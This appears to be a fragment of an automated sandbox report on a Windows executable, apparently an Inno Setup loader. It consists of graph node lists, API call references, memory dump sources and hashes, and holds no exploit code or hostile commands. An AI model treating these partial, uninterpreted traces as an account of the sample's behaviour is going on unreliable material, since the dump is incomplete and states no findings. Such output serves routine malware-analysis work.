5113->5115 5114->5017 5115->5114 5117 407a35 5116->5117 5118 405880 4 API calls 5117->5118 5119 407a89 5117->5119 5118->5119 5120 407918 InterlockedExchange 5119->5120 5121 407a9b 5120->5121 5122 405880 4 API calls 5121->5122 5123 407ab1 5121->5123 5122->5123 5124 407af4 5123->5124 5125 405880 4 API calls 5123->5125 5124->5020 5125->5124 5130 408b82 5126->5130 5133 408b39 5126->5133 5127 408bcd 5441 407cb8 5127->5441 5129 408be4 5134 4031b8 4 API calls 5129->5134 5130->5127 5132 4034f0 4 API calls 5130->5132 5138 4031e8 4 API calls 5130->5138 5139 403420 4 API calls 5130->5139 5141 407cb8 21 API calls 5130->5141 5132->5130 5133->5130 5135 403420 4 API calls 5133->5135 5136 4031e8 4 API calls 5133->5136 5140 407cb8 21 API calls 5133->5140 5432 4034f0 5133->5432 5137 408bfe 5134->5137 5135->5133 5136->5133 5152 404c10 5137->5152 5138->5130 5139->5130 5140->5133 5141->5130 5467 4078c4 5142->5467 5146 409ac1 5145->5146 5147 409aa9 
5145->5147 5149 405880 4 API calls 5146->5149 5148 405880 4 API calls 5147->5148 5150 409abb 5148->5150 5151 409ad2 5149->5151 5150->5013 5151->5013 5153 402594 4 API calls 5152->5153 5154 404c1b 5153->5154 5154->5024 5155->5029 5157 403164 5156->5157 5158 40318c TlsGetValue 5156->5158 5157->5032 5159 403196 5158->5159 5160 40316f 5158->5160 5159->5032 5164 40310c 5160->5164 5162 403174 TlsGetValue 5163 403184 5162->5163 5163->5032 5165 403120 LocalAlloc 5164->5165 5166 403116 5164->5166 5167 40313e TlsSetValue 5165->5167 5168 403132 5165->5168 5166->5165 5167->5168 5168->5162 5241 405930 5169->5241 5172 405270 GetSystemDefaultLCID 5176 4052a6 5172->5176 5173 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5173->5176 5174 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5174->5176 5175 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5175->5176 5176->5173 5176->5174 5176->5175 5180 405308 5176->5180 5177 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5177->5180 5178 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5178->5180 5179 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5179->5180 5180->5177 5180->5178 5180->5179 5181 40538b 5180->5181 5274 4031b8 5181->5274 5184 4053b4 GetSystemDefaultLCID 5278 4051fc GetLocaleInfoA 5184->5278 5187 4031e8 4 API calls 5188 4053f4 5187->5188 5189 4051fc 5 API calls 5188->5189 5190 405409 5189->5190 5191 4051fc 5 API calls 5190->5191 5192 40542d 5191->5192 5284 405248 GetLocaleInfoA 5192->5284 5195 405248 GetLocaleInfoA 5196 40545d 5195->5196 5197 4051fc 5 API calls 5196->5197 5198 405477 5197->5198 5199 405248 GetLocaleInfoA 5198->5199 5200 405494 5199->5200 5201 4051fc 5 API calls 5200->5201 5202 4054ae 5201->5202 5203 4031e8 4 API calls 5202->5203 5204 4054bb 5203->5204 5205 4051fc 5 API calls 5204->5205 5206 4054d0 5205->5206 5207 4031e8 4 API calls 5206->5207 5208 4054dd 5207->5208 5209 405248 GetLocaleInfoA 5208->5209 5210 4054eb 
5209->5210 5211 4051fc 5 API calls 5210->5211 5212 405505 5211->5212 5213 4031e8 4 API calls 5212->5213 5214 405512 5213->5214 5215 4051fc 5 API calls 5214->5215 5216 405527 5215->5216 5217 4031e8 4 API calls 5216->5217 5218 405534 5217->5218 5219 4051fc 5 API calls 5218->5219 5220 405549 5219->5220 5221 405566 5220->5221 5222 405557 5220->5222 5224 40322c 4 API calls 5221->5224 5292 40322c 5222->5292 5225 405564 5224->5225 5226 4051fc 5 API calls 5225->5226 5227 405588 5226->5227 5228 4055a5 5227->5228 5229 405596 5227->5229 5231 403198 4 API calls 5228->5231 5230 40322c 4 API calls 5229->5230 5232 4055a3 5230->5232 5231->5232 5286 4033b4 5232->5286 5234 4055c7 5235 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5234->5235 5236 4055e1 5235->5236 5237 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5236->5237 5238 4055fb 5237->5238 5239 405ce4 GetVersionExA 5238->5239 5240 405cfb 5239->5240 5240->5049 5242 40593c 5241->5242 5249 404ccc LoadStringA 5242->5249 5245 4031e8 4 API calls 5246 40596d 5245->5246 5252 403198 5246->5252 5256 403278 5249->5256 5253 4031b7 5252->5253 5254 40319e 5252->5254 5253->5172 5254->5253 5270 4025ac 5254->5270 5261 403254 5256->5261 5258 403288 5259 403198 4 API calls 5258->5259 5260 4032a0 5259->5260 5260->5245 5262 403274 5261->5262 5263 403258 5261->5263 5262->5258 5266 402594 5263->5266 5265 403261 5265->5258 5267 402598 5266->5267 5268 4025a2 5266->5268 5267->5268 5269 403154 4 API calls 5267->5269 5268->5265 5268->5268 5269->5268 5271 4025b0 5270->5271 5272 4025ba 5270->5272 5271->5272 5273 403154 4 API calls 5271->5273 5272->5253 5272->5272 5273->5272 5275 4031be 5274->5275 5276 4031e3 5275->5276 5277 4025ac 4 API calls 5275->5277 5276->5184 5277->5275 5279 405223 5278->5279 5280 405235 5278->5280 5282 403278 4 API calls 5279->5282 5281 40322c 4 API calls 5280->5281 5283 405233 5281->5283 5282->5283 5283->5187 5285 405264 5284->5285 5285->5195 5287 4033bc 5286->5287 5288 403254 4 API calls 5287->5288 5289 4033cf 

                                                          Control-flow Graph: function 00409B30-00409BEB (GetSystemInfo, VirtualQuery, VirtualProtect)
                                                          APIs
                                                          • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                          • String ID:
                                                          • API String ID: 2441996862-0
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                          Similarity
                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                          • API String ID: 3256987805-3653653586

                                                          Control-flow Graph

                                                          APIs
                                                          • SetLastError.KERNEL32 ref: 0040A0F4
                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0210178C), ref: 0040966C
                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                          • SetWindowLongA.USER32(00020416,000000FC,00409918), ref: 0040A148
                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                          • 73A25CF0.USER32(00020416,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                          Similarity
                                                          • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                          • API String ID: 3341979996-3001827809

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                          • API String ID: 1646373207-2130885113

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                          • SetWindowLongA.USER32(00020416,000000FC,00409918), ref: 0040A148
                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                            • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90,00000000,00409A77), ref: 00409A14
                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90,00000000), ref: 00409A28
                                                            • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                            • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90), ref: 00409A5C
                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                          • 73A25CF0.USER32(00020416,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                          • API String ID: 978128352-3001827809

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90,00000000,00409A77), ref: 00409A14
                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90,00000000), ref: 00409A28
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90), ref: 00409A5C
                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0210178C), ref: 0040966C
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                          • String ID: D
                                                          • API String ID: 3356880605-2746444292

                                                          Control-flow Graph

                                                          APIs
                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: .tmp$y@
                                                          • API String ID: 2030045667-2396523267

                                                          Control-flow Graph

                                                          APIs
                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: .tmp$y@
                                                          • API String ID: 2030045667-2396523267

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID: .tmp
                                                          • API String ID: 1375471231-2986845003

                                                          Control-flow Graph: function 004076DC-00407917 (WriteFile, InterlockedExchange)
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                          • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                          • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                          • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                          Control-flow Graph
                                                          control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLibraryLoadMode
                                                          • String ID:
                                                          • API String ID: 2987862817-0
                                                          • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                          • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                          • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                          • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                          Control-flow Graph
                                                          control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
                                                          • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                          • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                          • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                          • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                          Control-flow Graph
                                                          control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastRead
                                                          • String ID:
                                                          • API String ID: 1948546556-0
                                                          • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                          • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                          • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                          • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                          Control-flow Graph
                                                          control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
                                                          • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                          • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                          • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                          • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFree
                                                          • String ID:
                                                          • API String ID: 2087232378-0
                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                          APIs
                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                            • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                          • String ID:
                                                          • API String ID: 1658689577-0
                                                          • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                          • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                          • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                          • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                          • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                          • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                          • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                          • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                          • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID:
                                                          • API String ID: 442123175-0
                                                          • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                          • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                          • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                          • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                          APIs
                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
